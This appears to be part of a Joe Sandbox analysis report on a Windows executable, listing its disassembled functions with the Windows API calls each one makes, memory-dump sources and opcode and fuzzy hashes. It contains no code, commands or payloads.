                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                            • __isleadbyte_l.LIBCMT ref: 004208A6
                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                            Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32(?), ref: 004503C8
                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Proc$Parent
                            • String ID:
                            • API String ID: 2351499541-0
                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                            Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                            • TranslateMessage.USER32(?), ref: 00442B01
                            • DispatchMessageW.USER32(?), ref: 00442B0B
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchTranslate
                            • String ID:
                            • API String ID: 1795658109-0
                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                            Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                            • GetCaretPos.USER32(?), ref: 004743B2
                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                            • GetForegroundWindow.USER32 ref: 004743EE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                            Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                            • _wcslen.LIBCMT ref: 00449519
                            • _wcslen.LIBCMT ref: 00449526
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend_wcslen$_wcspbrk
                            • String ID:
                            • API String ID: 2886238975-0
                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                            Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __setmode$DebugOutputString_fprintf
                            • String ID:
                            • API String ID: 1792727568-0
                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                            Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Long$AttributesLayered
                            • String ID:
                            • API String ID: 2169480361-0
                            • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                            • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                            Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                            • String ID: cdecl
                            • API String ID: 3850814276-3896280584
                            • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                            • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                            Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                            • _memmove.LIBCMT ref: 0046D475
                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 2502553879-0
                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                            Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32 ref: 00448C69
                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow
                            • String ID:
                            • API String ID: 312131281-0
                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                            Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                            Download Yara Rule
                            APIs
                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLastacceptselect
                            • String ID:
                            • API String ID: 385091864-0
                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                            Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                            Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                            Download Yara Rule
                            APIs
                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                            • GetStockObject.GDI32(00000011), ref: 00430258
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$CreateMessageObjectSendShowStock
                            • String ID:
                            • API String ID: 1358664141-0
                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                            Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                            • String ID:
                            • API String ID: 2880819207-0
                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                            Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            • String ID:
                            • API String ID: 357397906-0
                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
